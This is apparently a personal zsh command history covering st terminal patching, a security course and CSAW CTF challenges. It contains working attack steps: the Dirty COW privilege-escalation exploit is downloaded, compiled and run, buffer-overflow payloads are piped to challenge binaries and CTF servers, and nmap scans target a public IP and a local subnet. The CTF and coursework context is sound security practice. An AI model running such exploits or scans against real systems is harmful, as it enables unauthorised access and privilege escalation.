: 1536595241:0;rm patches/git-st-keyboard_select-20180619-937e367.diff
: 1536595457:0;patch ../ st-keyboard_select-0.8.1.diff
: 1536595463:0;patch ../* st-keyboard_select-0.8.1.diff
: 1536595899:0;wget https://st.suckless.org/patches/clipboard/st-clipboard-0.8.1.diff
: 1536595911:0;mv st-clipboard-0.8.1.diff patches
: 1536595927:0;patch ./* patches/st-clipboard-0.8.1.diff
: 1536595950:0;patch ../* st-clipboard-0.8.1.diff
: 1536595973:0;cd ../
: 1536596022:0;rm x.c.rej
: 1536596053:0;nano x.c
: 1536596413:0;man st
: 1536596497:0;git apply patches/st-clipboard-0.8.1.diff
: 1536596536:0;rm x.c.orig x.c.rej
: 1536596594:0;git reset
: 1536596599:0;git reset --force
: 1536596669:0;wget https://st.suckless.org/patches/clipboard/st-clipboard-20180309-c5ba9c0.diff
: 1536596681:0;mv st-clipboard-20180309-c5ba9c0.diff patches
: 1536596702:0;git apply patches/st-clipboard-20180309-c5ba9c0.diff
: 1536596711:0;git am patches/st-clipboard-20180309-c5ba9c0.diff
: 1536596778:0;patch ./* patches/st-clipboard-20180309-c5ba9c0.diff
: 1536596841:0;patch -Np1 < patches/st-clipboard-20180309-c5ba9c0.diff
: 1536596891:0;rm x.c
: 1536596931:0;mv st/x.c ~/st/
: 1536596937:0;rm x.c.*
: 1536596949:0;patch -p1 < patches/st-clipboard-20180309-c5ba9c0.diff
: 1536596969:0;git apply patches/st-keyboard_select-0.8.1.diff
: 1536629570:0;rm st-clipboard-20180309-c5ba9c0.diff
: 1536629618:0;nano ../config.def.h
: 1536629681:0;wget https://st.suckless.org/patches/keyboard_select/st-keyboard_select-0.8.1.diff
: 1536629701:0;patch -p1 patches/st-keyboard_select-0.8.1.diff
: 1536697024:0;patch -p1 patches/st-clipboard-0.8.1.diff
: 1536697091:0;rm *
: 1536697136:0;patch -p1 ./** < patches/st-keyboard_select-0.8.1.diff
: 1536697143:0;patch -p1 ./**  patches/st-keyboard_select-0.8.1.diff
: 1536697541:0;rm ls
: 1536697622:0;nano patches/st-clipboard-0.8.1.diff
: 1536704266:0;cd ~/Videos/patches
: 1536704275:0;wget https://st.suckless.org/patches/vertcenter/st-vertcenter-20180320-6ac8c8a.diff
: 1536704299:0;rm st-keyboard_select-0.8.1.diff.1
: 1536704397:0;patch -p1 < patches/st-keyboard_select-0.8.1.diff
: 1536704449:0;patch -p0 < patches/st-keyboard_select-0.8.1.diff
: 1536704468:0;man patch
: 1536704858:0;nano patches/st-keyboard_select-0.8.1.diff
: 1536704928:0;cp -r ~/Videos/patches st
: 1536705087:0;patch -v -p2 < patches/st-keyboard_select-0.8.1.diff
: 1536705095:0;patch --verbose -p2 < patches/st-keyboard_select-0.8.1.diff
: 1536716187:0;ping alefir.dlinkddns.com
: 1536716207:0;sudo apt install nmap
: 1536716422:0;nmap -A 68.6.205.96
: 1536717031:0;nano ~?.zshrc
: 1536717076:0;gedit ~/.zshrc
: 1536717185:0;nmap -p- 68.6.205.96
: 1536717491:0;nmap -p 80 68.6.205.96:80
: 1536717508:0;ping 68.6.205.96:80
: 1536717644:0;nmap -p 80 68.6.205.96
: 1536717656:0;nmap -p 32400 68.6.205.96
: 1536717672:0;nmap -Pn -p 32400 68.6.205.96
: 1536717680:0;nmap -Pn -p 80 68.6.205.96
: 1536717690:0;nmap -Pn -p- 80 68.6.205.96
: 1536717698:0;nmap -Pn -p- 68.6.205.96
: 1536759120:0;rm st
: 1536759606:0;wget ~/Downloads/patches/https://st.suckless.org/patches/vertcenter/st-vertcenter-20180320-6ac8c8a.diff
: 1536759629:0;cd Downloads/p
: 1536759635:0;cd Videos
: 1536759637:0;cd patches
: 1536759715:0;cp ~/Videos/patches ./
: 1536759722:0;cp -r  ~/Videos/patches ./
: 1536759794:0;patch -p1 < patches/st-clipboard-0.8.1.diff
: 1536759817:0;patch -p1 < patches/st-vertcenter-20180320-6ac8c8a.diff
: 1536759853:0;sudo make clean
: 1536759919:0;nano /tmp/st/config.def.h
: 1536760235:0;rm diff
: 1536760982:0;nano /tmp/st
: 1536760992:0;cd /tmp/st
: 1536761087:0;nano ~/Documents/notes/win-notes
: 1536761194:0;man ntfs
: 1536761465:0;/usr/local/bin/st
: 1536761554:0;pwd
: 1536761572:0;rm *.rej
: 1536761581:0;rm *.orig
: 1536761590:0;patch -p2 < patches/st-keyboard_select-0.8.1.diff
: 1536761600:0;cat config.def.rej
: 1536761606:0;cat config.def.h.rej
: 1536761701:0;nano config.def.h
: 1536761735:0;cat /tmp/st/config.def.h.rej
: 1536763091:0;s
: 1536763374:0;st
: 1536763414:0;mkdir -p Documents/projects
: 1536763423:0;mv st Documents/projects
: 1536763427:0;rm ~/st
: 1536763449:0;git clone git://git.suckless.org/st
: 1536763492:0;rm Documents/projects/st/{*.rej,*.o}
: 1536763494:0;ll st
: 1536763503:0;ll Documents/projects/st
: 1536763546:0;wc -l Documents/projects/st
: 1536763551:0;wc -l ~/Documents/projects/st
: 1536763561:0;ls | wc -l ~/Documents/projects/st
: 1536763567:0;man wc
: 1536763572:0;wc
: 1536763576:0;wc ~
: 1536763582:0;wc -l st
: 1536763585:0;wc -l st/*
: 1536763736:0;mv Documents/projects ~/Documents
: 1536763750:0;rm ~/Documents/projects/st/st
: 1536763751:0;ls ~/Documents/projects/st | wc -l
: 1536763759:0;ls st | wc -l
: 1536764106:0;nano Videos/config.def.h
: 1536764382:0;nano Documents/projects/st
: 1536764388:0;nano Documents/projects/st/config.h
: 1536764474:0;la ~
: 1536764910:0;git init
: 1536764943:0;git remote reset
: 1536764950:0;git remote remove origin
: 1536764953:0;git remote add origin git@gitlab.com:ArtificialAmateur/st.git
: 1536765736:0;sudo make install
: 1536765796:0;nano config.mk
: 1536765839:0;nano README
: 1536765933:0;ls patches
: 1536766233:0;cd .
: 1536766247:0;lscolors
: 1536766298:0;cd Documents/projects/st
: 1536766304:0;git add .
: 1536766311:0;git commit -m "Initial commit"
: 1536766446:0;mv README README.md
: 1536766452:0;git add README
: 1536766454:0;git add README.md
: 1536766460:0;git commit -m "Fix README"
: 1536766467:0;git push -u origin master
: 1536766892:0;cd Documents
: 1536766900:0;mv c-exercises projects
: 1536766906:0;mv cybr2250/ projects
: 1536766915:0;cd projects
: 1536768527:0;wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
: 1536768531:0;nano dirty.c
: 1536768687:0;mv dirty.c hw_assgn.c
: 1536768719:0;scp hw_assgn.c ftursi@loki.ist.unomaha.edu:~/
: 1536768763:0;gcc -pthread -o binary -lcrypt hw_assgn.c
: 1536768766:0;./hw_assgn.c
: 1536768774:0;./binary
: 1536768803:0;cat /etc/passwd
: 1536768833:0;nano hw_assgn.c
: 1536768848:0;su patchsys
: 1536768860:0;rm binary hw_assgn.c
: 1536792091:0;lla
: 1536792097:0;rm luke_st
: 1536792109:0;cd Documents/projects
: 1536794243:0;ll
: 1536799747:0;cd st
: 1536799751:0;nano config.h
: 1536799781:0;cd cybr2250
: 1536804230:0;mkdir assign-1
: 1536804235:0;mkdir assign-2
: 1536804245:0;mv store.c assign-1
: 1536804254:0;mv enigma* assign-2
: 1536804260:0;mv input.txt assign-2
: 1536810221:0;./enigma input.txt | grep "21114"
: 1536959825:0;mkdir ctf
: 1536959833:0;mv Downloads/get_it ctf
: 1536959845:0;sudo chmod +x get_it
: 1536959980:0;sudo apt install binwalk
: 1536960113:0;chmod +x boi
: 1536960172:0;strings boi
: 1536960203:0;binwalk boi
: 1536960212:0;cat boi
: 1536960251:0;xxd b
: 1536960429:0;nano com.yourcompany.whyos_4.2.0-28debug_iphoneos-arm.deb
: 1536960449:0;dpkg -i com.yourcompany.whyos_4.2.0-28debug_iphoneos-arm.deb
: 1536960451:0;sudo dpkg -i com.yourcompany.whyos_4.2.0-28debug_iphoneos-arm.deb
: 1536960499:0;dpkg-deb -R com.* tmp
: 1536960513:0;ls DEBIAN
: 1536960530:0;nano Library/MobileSubstrate/DynamicLibraries/whyOS.dylib
: 1536960538:0;nano Library/MobileSubstrate/DynamicLibraries/whyOS.plist
: 1536960553:0;nano Library/PreferenceBundles/whyOSsettings.bundle/Info.plist
: 1536960603:0;nano Library/PreferenceBundles/whyOSsettings.bundle/Root.plist 
: 1536960648:0;nano Library/PreferenceBundles/whyOSsettings.bundle/whyOSsettings
: 1536960665:0;nano -w Library/PreferenceBundles/whyOSsettings.bundle/whyOSsettings
: 1536960677:0;strings Library/PreferenceBundles/whyOSsettings.bundle/whyOSsettings
: 1536960697:0;file Library/PreferenceBundles/whyOSsettings.bundle/whyOSsettings
: 1536960734:0;file Library/PreferenceLoader/Preferences/whyOSsettings.plist 
: 1536960738:0;nano Library/PreferenceLoader/Preferences/whyOSsettings.plist 
: 1536960822:0;nano DEBIAN/control
: 1536960886:0;dpkg -i fixed.deb
: 1536961127:0;whereis whyOS
: 1536961134:0;whereis com.yourcompany.whyOS
: 1536961276:0;nano /var/log/apt/history.log
: 1536961293:0;nano /var/log/dpkg.log
: 1536961354:0;nano tmp/DEBIAN/control
: 1536961391:0;dpkg-deb -b tmp fixed.deb
: 1536961413:0;sudo apt purge com.yourcompany.whyos
: 1536961418:0;sudo dpkg -i fixed.deb
: 1536961422:0;whyOS
: 1536961425:0;whyos
: 1536961433:0;whereis whyos
: 1536961462:0;dpkg-deb --info com.yourcompany.whyos_4.2.0-28debug_iphoneos-arm.deb
: 1536961586:0;nano console.log
: 1536961603:0;cat console.log | grep '_'
: 1536961614:0;cat console.log | grep 'flag'
: 1536961895:0;cat console.log | grep 'setflag'
: 1536961897:0;cat console.log | grep 'set'
: 1536961949:0;cat console.log | grep -E 'flag'
: 1536961957:0;cat console.log | grep -E 'flag|set'
: 1536961982:0;cat console.log | grep -E 'flag.*set'
: 1536961985:0;cat console.log | grep -E 'flag*set'
: 1536961992:0;cat console.log | grep -E 'set.*flag'
: 1536962033:0;binwalk get_it
: 1536962038:0;strings get_it
: 1536962181:0;xxd get_it
: 1536962223:0;q
: 1536962229:0;cat get_it
: 1536962466:0;nc pwn.chal.csaw.io 9001
: 1536962485:0;nc pwn.chal.csaw.io 9003
: 1536962685:0;python -c 'print "a"*32 + "\x9d\x84\x04\x08"'
: 1536962695:0;python -c 'print "a"*32 + "\x9d\x84\x04\x08"' | ./boi
: 1536962758:0;objdump -d get_it
: 1536962869:0;nano tmp
: 1536963535:0;python -c 'print "a"*32 + "\xb6\x05\x40\x00"' | ./get_it
: 1536964993:0;sudo apt install nasm
: 1536965023:0;file tacOS.bin
: 1536965050:0;sudo apt install qemu
: 1536965181:0;python -c 'print "a"*40 + "\xb6\x05\x40\x00"' | ./get_it
: 1536965188:0;python -c 'print "a"*39 + "\xb6\x05\x40\x00"' | ./get_it
: 1536965198:0;python -c 'print "a"*34 + "\xb6\x05\x40\x00"' | ./get_it
: 1536965232:0;sudo apt install qemu qemu-kvm
: 1536965267:0;gedit Makefile
: 1536965662:0;nano m
: 1536965696:0;qemu-system-x86_64 -serial stdio -d guest_errors -drive format=raw,file=tacOS.bin
: 1536965847:0;nc cryptochal.csaw.io 8040
: 1536965883:0;nc crypto.chal.csaw.io 8041
: 1536966278:0;sudo apt install pip
: 1536966289:0;sudo apt install python-pip
: 1536966412:0;pip install Crypto
: 1536966700:0;python ./serv-distribute.py
: 1536966705:0;nc crypto.chal.csaw.io 8040
: 1536966834:0;file boi
: 1536966839:0;file get_it
: 1536966918:0;python -c 'print "a"*35 + "\xb6\x05\x40\x00"' | ./boi
: 1536966921:0;python -c 'print "a"*36 + "\xb6\x05\x40\x00"' | ./boi
: 1536966926:0;python -c 'print "a"*40 + "\xb6\x05\x40\x00"' | ./boi
: 1536966930:0;python -c 'print "a"*46 + "\xb6\x05\x40\x00"' | ./boi
: 1536966934:0;python -c 'print "a"*50 + "\xb6\x05\x40\x00"' | ./boi
: 1536966937:0;python -c 'print "a"*255 + "\xb6\x05\x40\x00"' | ./boi
: 1536966943:0;python -c 'print "a"*1000000000 + "\xb6\x05\x40\x00"' | ./boi
: 1536966971:0;python -c 'print "a"*1000000000 + "\x26\x06\x40\x00"' | ./boi
: 1536966978:0;python -c 'print "a"*100000 + "\x26\x06\x40\x00"' | ./boi
: 1536966996:0;python -c 'print "a"*1000 + "\x26\x06\x40\x00"' | ./boi
: 1536966997:0;python -c 'print "a"*10000 + "\x26\x06\x40\x00"' | ./boi
: 1536967599:0;./boi
: 1536967620:0;objdump -d /boi
: 1536968121:0;python -c 'print "a"*24 + "\x0C\xAF\x3B\xAE\xEh"' | ./boi
: 1536968186:0;python -c 'print "a"*12h + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968191:0;python -c 'print "a"*24 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968343:0;python -c 'print "a"*34 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968391:0;python -c 'print "a"*30 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968407:0;python -c 'print "a"*6 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968457:0;python -c 'print "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968538:0;python -c 'print "a"*2 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968548:0;python -c 'print "a"*8 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968617:0;python -c 'print "a"*10 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968663:0;python -c 'print "a"*10 + "\xEE\xBE\xAF\xCA"' | ./boi
: 1536968691:0;objdump -d boi
: 1536968748:0;gdb boi
: 1536968873:0;python -c 'print "a"*8 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968877:0;python -c 'print "a"*10 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968880:0;python -c 'print "a"*6 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968883:0;python -c 'print "a"*4 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968887:0;python -c 'print "a"*2 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968916:0;python -c 'print "a"*5 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536968925:0;python -c 'print "a"*5 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968931:0;python -c 'print "a"*16 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536968936:0;python -c 'print "a"*16 + "\xEE\xBA\xAF\xCA"' | ./boi
: 1536970492:0;sudo ./linux_serverx64
: 1536970518:0;bash linux_serverx64
: 1536970524:0;file linux_serverx64
: 1536970552:0;chmod +x linux_serverx64
: 1536970583:0;./linux_serverx64 --help
: 1536970587:0;./linux_serverx64 -p
: 1536970594:0;./linux_serverx64 -p password
: 1536970600:0;./linux_serverx64 -P password
: 1536970677:0;./linux_serverx64 -P 'password'
: 1536971229:0;xxd boi
: 1536971705:0;nc pwn.chal.csaw.io 9000 < python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA"'
: 1536971713:0;nc pwn.chal.csaw.io 9000
: 1536971764:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA"' 
: 1536971783:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA"' > file
: 1536971795:0;cat file > nc pwn.chal.csaw.io 9000
: 1536971802:0;cat file | nc pwn.chal.csaw.io 9000
: 1536971854:0;python -c 'print "a"*10 + "\xEE\xBA\xF3\xCA"' | ./boi
: 1536971993:0;python -c 'print "a"*19 + "\xEE\xBA\xF3\xCA"' | ./boi
: 1536971998:0;python -c 'print "a"*18 + "\xEE\xBA\xF3\xCA"' | ./boi
: 1536972136:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA"' | nc pwn.chal.csaw.io 9000
: 1536972161:0;python -c 'print "a"*21 + "\xEE\xBA\xF3\xCA"' | ./boi
: 1536972208:0;python -c 'print "a"*20 + "\xCA\xF3\xBA\xEE"' | ./boi
: 1536972218:0;echo $0
: 1536972240:0;env
: 1536972250:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA"' | ./boi
: 1536972540:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "ls" ' | ./boi
: 1536972572:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "env" ' | ./boi
: 1536972583:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "echo $0" ' | ./boi
: 1536972625:0;man nc 
: 1536972705:0;nc pwn.chal.csaw.io 9000 -c 'python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "echo $0"'
: 1536972744:0;python -c 'print "a"*19 + "\xEE\xBA\xF3\xCA" + "; ls"' | nc pwn.chal.csaw.io 9000
: 1536972755:0;python -c 'print "a"*19 + "\xEE\xBA\xF3\xCA" + "ls"' | nc pwn.chal.csaw.io 9000
: 1536972784:0;man nc
: 1536972819:0;python -c 'print "a"*19 + "\xEE\xBA\xF3\xCA" + "echo $0"' | nc pwn.chal.csaw.io 9000
: 1536972828:0;python -c 'print "a"*19 + "\xEE\xBA\xF3\xCA"' | nc pwn.chal.csaw.io 9000
: 1536972839:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "echo $0"' | nc pwn.chal.csaw.io 9000
: 1536972852:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "ls"' | nc pwn.chal.csaw.io 9000
: 1536972867:0;python -c 'print "a"*20 + "\xEE\xBA\xF3\xCA" + "cat flag.txt"' | nc pwn.chal.csaw.io 9000
: 1536973567:0;./linux_serverx64
: 1536973629:0;neofetch
: 1536973642:0;htop
: 1536973732:0;python -c 'print "\x40\x05\xb6"' | ./get_it
: 1536973756:0;python -c 'print "a"*20 + "\x40\x05\xb6"' | nc pwn.chal.csaw.io 9000
: 1536973762:0;python -c 'print "a"*20 + "\x40\x05\xb6"' | ./get_it
: 1536973767:0;python -c 'print "a"*19 + "\x40\x05\xb6"' | ./get_it
: 1536973771:0;python -c 'print "a"*16 + "\x40\x05\xb6"' | ./get_it
: 1536973775:0;python -c 'print "a"*17 + "\x40\x05\xb6"' | ./get_it
: 1536973779:0;python -c 'print "a"*18 + "\x40\x05\xb6"' | ./get_it
: 1536975060:0;python -c 'print "a"*40 + "\x40\x05\xb6"' | ./get_it
: 1536975066:0;python -c 'print "a"*36 + "\x40\x05\xb6"' | ./get_it
: 1536975076:0;python -c 'print "a"*10 + "\x40\x05\xb6"' | ./get_it
: 1536975115:0;python -c 'print "a"*36 + "\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975123:0;python -c 'print "a"*30 + "\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975128:0;python -c 'print "a"*26 + "\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975133:0;python -c 'print "a"*27 + "\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975137:0;python -c 'print "a"*28 + "\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975148:0;python -c 'print "a"*36 + "echo $0"' | ./get_it
: 1536975202:0;python -c 'print "a"*36 + "\x00\x40\x05\xb6 + "echo $0"' | ./get_it
: 1536975206:0;python -c 'print "a"*36 + "\x00\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975218:0;python -c 'print "a"*36 + "\x00\x40\x05\xb6"' | ./get_it
: 1536975235:0;python -c 'print "a"*35 + "\x00\x40\x05\xb6" + "echo $0"' | ./get_it
: 1536975291:0;python -c 'print "a"*35 + "\x00\x40\x05\xb6"' | ./get_it
: 1536975326:0;python -c 'print "a"*35 + "\xb6\x05\x40\x00" + "echo $0"' | ./get_it
: 1536975338:0;./get_it
: 1536975351:0;python -c 'print "a"*35 + "\xb6\x05\x40\x00"' | ./get_it
: 1536975383:0;python -c 'print "a"*35 + "\xb6\x05\x40\x00"' | nc pwn.chal.csaw.io 9001
: 1536975396:0;python -c 'print "a"*35 + "\xb6\x05\x40\x00" + "ls"' | nc pwn.chal.csaw.io 9001
: 1536975419:0;python -c 'print "a"*36 + "\xb6\x05\x40\x00" + "ls"' | nc pwn.chal.csaw.io 9001
: 1536975434:0;python -c 'print "a"*36 + "\xb6\x05\x40\x00"' | ./get_it
: 1536975440:0;python -c 'print "a"*36 + "\xb6\x05\x40"' | ./get_it
: 1537022737:0;nc pwn.chal.csaw.io:9002
: 1537022977:0;xor
: 1537022981:0;sudo apt install xor
: 1537023033:0;sudo apt install xor-gate
: 1537023039:0;sudo apt search xor
: 1537031652:0;apt list --installed
: 1537031683:0;cat /var/log/apt
: 1537031687:0;cat /var/log/apt/history.log
: 1537031752:0;sudo apt purge gdb qemu qemu-kvm nasm whyOS
: 1537031761:0;sudo apt purge gdb qemu qemu-kvm nasm whyos
: 1537032444:0;rm file
: 1537032445:0;rm nc
: 1537032452:0;mv linux_serverx64 cr
: 1537032456:0;mv linux_serverx64 ctf
: 1537032479:0;mv cr ctf/linux_serverx64
: 1537032543:0;cd ctf
: 1537032546:0;rm boi
: 1537032550:0;rm co*
: 1537032552:0;rm fixed.deb
: 1537032554:0;rm get_it
: 1537032556:0;rm M
: 1537032566:0;rm serv-distribute.py
: 1537032569:0;rm stage-
: 1537032571:0;rm stage-*
: 1537032575:0;rm Makefile
: 1537032577:0;rm tac
: 1537032580:0;rm tacOS.bin
: 1537032583:0;rm tmp
: 1537032595:0;mv iowe lowe
: 1537032608:0;mkdir shell->code 
: 1537032622:0;rm code shell-
: 1537032627:0;file shellpointcode
: 1537032632:0;chmod +x shellpointcode
: 1537032638:0;./shellpointcode
: 1537032680:0;AAAAAAAAAAAAA
: 1537032688:0;objdump -d shellpointcode
: 1537032848:0;nc misc.chal.csaw.io 9000 | time
: 1537032852:0;nc misc.chal.csaw.io 9000 
: 1537032856:0;time
: 1537032886:0;file file.enc
: 1537032888:0;file key.enc
: 1537032893:0;file pubkey.pem
: 1537032896:0;nano pubkey.pem
: 1537033109:0;openssl rsautl -pubin -inkey pubkey.pem -decrypt -in pubkey.pem -out output.txt
: 1537036614:0;mkdir tmp
: 1537036615:0;cd tmp
: 1537036616:0;openssl rsa -in certificate.pem -out publickey.pem -outform PEM -pubout
: 1537036639:0;openssl rand 128 -out key.bin
: 1537036649:0;openssl rand --help
: 1537036681:0;openssl rand 128 -out key.txt
: 1537036690:0;openssl rand -base64 128 -out key.txt
: 1537036723:0;openssl rand -out key.txt 128
: 1537036820:0;cd ctf/lowe/tmp
: 1537036823:0;rm key.txt
: 1537036830:0;openssl rand -base64 -out key.txt 128
: 1537036835:0;cat key.txt
: 1537036850:0;cat ../key.enc
: 1537036907:0;openssl rsautl -dcrypt -inkey pubkey.pem -pubin -in file.enc -out decrypt
: 1537036913:0;openssl rsautl -decrypt -inkey pubkey.pem -pubin -in file.enc -out decrypt
: 1537037162:0;cc -o xor xor.c
: 1537037200:0;./xor key.enc < file.enc > xord.txt
: 1537037230:0;./xor key.enc < pubkey.pem > xord.txt
: 1537037234:0;cat xord.txt
: 1537037245:0;nano xord.txt
: 1537037261:0;cd ctf/lowe
: 1537037541:0;cd ../recovery
: 1537037555:0;mv disk.img0/disk.img* ./
: 1537037561:0;rm *.7z
: 1537037569:0;mv disk.img0/disk.img0 ./
: 1537037580:0;mv disk.img0/disk.img0 ./disk0.img
: 1537037595:0;mv disk.img1/disk.img1 ./disk1.img
: 1537037601:0;rm disk.img*
: 1537037609:0;fdisk disk0.img
: 1537037616:0;fdisk d-l isk0.img
: 1537037620:0;fdisk -l disk0.img
: 1537037704:0;file disk1.img
: 1537037710:0;file disk0.img
: 1537037730:0;fdisk -lu disk0.img
: 1537037734:0;fdisk -lu disk1.img
: 1537037789:0;mount -o loop,offset=49245 disk0.img /mnt/disk0
: 1537037803:0;mkdir /mnt/disk0
: 1537037805:0;sudo mkdir /mnt/disk0
: 1537037807:0;sudo mount -o loop,offset=49245 disk0.img /mnt/disk0
: 1537037831:0;sudo mount -t auto -o loop,offset=49245 disk0.img /mnt/disk0
: 1537037888:0;cd ../rewind
: 1537037961:0;nc misc.chal.csaw.io 9002
: 1537038775:0;cd ../flatcrypto
: 1537038794:0;chmod +x serv-distribute.py
: 1537038889:0;gedit serv-distribute.py
: 1537039012:0;nano os
: 1537039317:0;nano serv-distribute.py
: 1537039327:0;./serv-distribute.py
: 1537039342:0;python serv-distribute.py
: 1537039554:0;pdb
: 1537039559:0;pdb serv-distribute.py
: 1537040206:0;cd ~/Documents
: 1537042433:0;sudo apt install imagemagick
: 1537043431:0;pip install sympy
: 1537045893:0;nano script.py
: 1537045902:0;python script.py
: 1537046788:0;cd ~/ctf/recovery
: 1537046802:0;file 02.mac
: 1537046808:0;file 00.txt
: 1537046811:0;file 01.txt
: 1537046814:0;cat *.txt
: 1537046899:0;cat disk1/0*
: 1537046923:0;nc misc.chal.csaw.io 9000
: 1537048790:0;sudo apt-get install ccache cmake make g++-multilib gdb \\
  pkg-config coreutils python-pexpect manpages-dev git \\
  ninja-build capnproto libcapnp-dev realpath
: 1537050338:0;cd lowe
: 1537050348:0;rm tmp xor*
: 1537050357:0;cat file.enc
: 1537050363:0;cat key.enc
: 1537050368:0;cat pubkey.pem
: 1537050689:0;cat /dev/urandom
: 1537056619:0;flashrom
: 1537060230:0;nmap -Pn 192.168.0.0/24
: 1537060296:0;nmap -sL 192.168.0.0/24
: 1537060325:0;nmap -sP 192.168.0.0/24
: 1537060544:0;nmap -A 192.168.0.13
: 1537135135:0;vim stage-1.asm
: 1537135348:0;nano -w stage-
: 1537135351:0;nano -w stage-1.asm
: 1537135407:0;source ~/.zshrc
: 1537135420:0;cd Documents/ctf/x86
: 1537135424:0;nano stage-1.asm
: 1537135433:0;nano --help
: 1537135452:0;nano -% stage-1.asm
: 1537135459:0;nano -$ stage-1.asm
: 1537192553:0;cd Documents/projects/cybr2250
: 1537192558:0;cd assign-2
: 1537194625:0;man intel-microcode
: 1537194627:0;fwupd
: 1537194635:0;fwupdate
: 1537194638:0;fwupdate -l
: 1537194640:0;sudo fwupdate -l
: 1537194647:0;sudo fwupdate -s
: 1537194652:0;sudo fwupdate -i
: 1537194655:0;sudo fwupdate -v
: 1537194661:0;sudo fwupdate -v -l
: 1537194663:0;sudo fwupdate -v -e
: 1537194705:0;sudo fwupdate --help
: 1537194717:0;sudo fwupdate -?
: 1537194768:0;sudo fwupdate -s -v
: 1537194795:0;cat /var/log/apt/history.log | grep 'fw'
: 1537194801:0;cat /var/log/apt/history.log | grep 'fwupdw'
: 1537194805:0;cat /var/log/apt/history.log | grep 'fwupd'
: 1537194828:0;sudo apt list fwupd
: 1537194862:0;sudo apt purge fwupd
: 1537194883:0;dpkg --get-selections
: 1537194902:0;dpkg --get-selections | grep 'fwupd'
: 1537220170:0;la
: 1537220294:0;./enigma
: 1537285197:0;nano Documents/ctf/x86/stage-1.asm
: 1537285269:0;nano --help Documents/ctf/x86/stage-1.asm
: 1537285275:0;nano -$ Documents/ctf/x86/stage-1.asm
: 1537286590:0;sudo tasksel
: 1537328721:0;gedit input.txt
: 1537329450:0;sudo dpkg -i code_1.27.2-1536736588_amd64.deb
: 1537329477:0;sudo apt install -f
: 1537739556:0;sudo apt install cherrytree
: 1537748947:0;nano file
: 1537748956:0;gedit file
: 1537762735:0;./enigma input.txt~
: 1537764645:0;l
: 1537764647:0;sls
: 1537764651:0;chmod +x official
: 1537765131:0;cp input.txt file.txt
: 1537804626:0;tmux list-sessions
: 1537928030:0;sudo apt purge chromium gcolor2
: 1537928281:0;cp Downloads/enigma.c Documents/projects/cybr2250/assign-2/marvin.c
: 1537928438:0;./marvin input.txt > output.txt
: 1537928444:0;./marvin output.txt > input.txt
: 1537932290:0;gcc -Wall -std=c1x -o marvin marvin.c
: 1537932680:0;sudo apt install gdb
: 1537933319:0;gcc enigma.c -g
: 1537933323:0;gdb ./enigma a.out input.txt
: 1537937372:0;gdb ./enigma a.out
: 1537937764:0;./enigma output.txt > input.txt
: 1537937768:0;cat input.txt
: 1537982643:0;cat output.txt
: 1537982650:0;mv output.txt input.txt
: 1537983028:0;./a.out input.txt
: 1537983043:0;rm a.out
: 1537983082:0;rm input.txt
: 1537983118:0;./official file.txt
: 1537983130:0;./marvin file.txt
: 1537983159:0;./official file.txt > output.txt
: 1537983273:0;./enigma file.txt > output.txt
: 1538001377:0;gedit enigma
: 1538001381:0;gedit enigma.c
: 1538001417:0;gedit ../assign-1/store.c
: 1538002335:0;ssh ftursi@loki.ist.unomaha.edu
: 1538002388:0;echo $TERM
: 1538002785:0;nano enigma
: 1538002872:0;cat file.txt
: 1538002882:0;gdb enigma
: 1538003141:0;gcc -Wall -std=c1x -o enigma enigma.c
: 1538003172:0;nano file.txt
: 1538003184:0;./enigma file.txt
: 1538003199:0;mv file.txt input.txt
: 1538003376:0;scp enigma.c ftursi@loki.ist.unomaha.edu:~/
: 1538003391:0;scp input.txt ftursi@loki.ist.unomaha.edu:~/
: 1538003405:0;rm marvin*
: 1538004285:0;cp enigma.c test.c
: 1538006473:0;./official input.txt > output.txt
: 1538006477:0;./official output.txt
: 1538006483:0;./enigma input.txt > output.txt
: 1538006488:0;./enigma output.txt
: 1538012636:0;fg
: 1538013209:0;nano input.txt
: 1538013588:0;gcc -Wall -std=c1x -o test test.c
: 1538013626:0;./test input.txt
: 1538013639:0;./test input.txt > output.txt
: 1538013643:0;./test output.txt
: 1538013657:0;nano test.c
: 1538014019:0;cp enigma.c test2.c
: 1538014449:0;gcc -Wall -std=c1x -o test2 test2.c
: 1538014457:0;./test2 input.txt
: 1538014475:0;./official input.txt
: 1538014482:0;./enigma input.txt
: 1538015286:0;./marvin input.txt
: 1538151786:0;sudo apt install chromium
: 1538154984:0;ssh -p 2220 bandit.labs.overthewire.org
: 1538155013:0;ssh -p 2220 bandit0@bandit.labs.overthewire.org
: 1538155287:0;ssh -p 2220 bandit1@bandit.labs.overthewire.org
: 1538155341:0;ssh -p 2220 bandit2@bandit.labs.overthewire.org
